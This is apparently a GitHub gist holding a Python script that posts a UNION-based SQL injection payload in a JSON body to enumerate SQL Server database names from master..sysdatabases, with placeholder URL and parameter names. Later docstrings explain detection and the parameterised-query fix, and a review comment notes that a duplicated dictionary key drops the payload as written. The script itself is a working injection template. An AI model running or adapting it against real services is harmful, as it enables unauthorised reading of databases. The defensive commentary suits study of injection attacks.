
@scovell scovell/json_sqli.py
Created Nov 27, 2012

json_sqli.py
#!/usr/bin/python
import json
import requests
# Sends the payload as a JSON request and prints the marked rows from the reply
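def sqli(payload):
    """POST *payload* as a JSON body and print the rows carrying the marker.

    The payload dict is serialised with json.dumps and sent to ``url``,
    which is a placeholder in this listing. The reply is parsed as JSON and
    iterated; for every item whose ``value`` field equals the string
    "31337", the item's ``name`` field is printed.

    Security context: judging by the payload built in main(), the script
    produces output only when the receiving endpoint splices a value from
    the JSON body into SQL text. Binding request values as query parameters
    on the server removes that condition; accepting JSON instead of form
    fields does not change it. In request or database logs the traffic is
    recognisable by SQL keywords (UNION SELECT, a trailing ``--``) inside a
    JSON string value and by the constant 31337 in the select list.

    Args:
        payload: dict that becomes the JSON request body.

    Raises:
        ValueError: if the reply body is not valid JSON (from json.loads).
        requests.exceptions.RequestException: on connection failure or
            timeout.
    """
    body = json.dumps(payload)
    # Declare the request body as JSON. The reply is requested as text/plain
    # but is parsed as JSON below.
    headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
    url = "SQLI URL"  # placeholder left by the author
    # Bound the wait: without a timeout requests blocks indefinitely on an
    # unresponsive endpoint.
    req = requests.post(url, data=body, headers=headers, timeout=30)
    response = json.loads(req.text)
    for r in response:
        # 31337 is the constant the payload puts in the first selected
        # column; only rows carrying it came from the appended SELECT.
        if r['value'] == "31337":
            # print() with one argument behaves the same on Python 2 and 3.
            print(r['name'])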
def main():
    """Build the request body and pass it to sqli().

    The first value closes a quoted literal ('4') and appends a UNION SELECT
    that reads the ``name`` column of master..sysdatabases, with the constant
    31337 in the first column so that sqli() can recognise the returned rows.
    The trailing ``--`` comments out whatever SQL the server would have
    appended after the value.

    Defensive reading: this is the shape of input that server-side code
    must never concatenate into a statement. Parameterised queries are the
    fix; restricting what the application's database login may read limits
    what a query like this can return if one is missed.
    """
    # NOTE(review): both keys are the same placeholder string. A dict
    # literal keeps only the last value for a repeated key, so as written
    # the first entry is discarded before sqli() receives the dict.
    request_fields = {
        "PARAMETER": "PARAMETER:'4' UNION SELECT 31337,name COLLATE Arabic_CI_AS FROM master..sysdatabases--",
        "PARAMETER": "PARAMETER",
    }
    sqli(request_fields)
# Script entry point. There is no __main__ guard, so the request is also sent
# when this file is imported as a module.
main()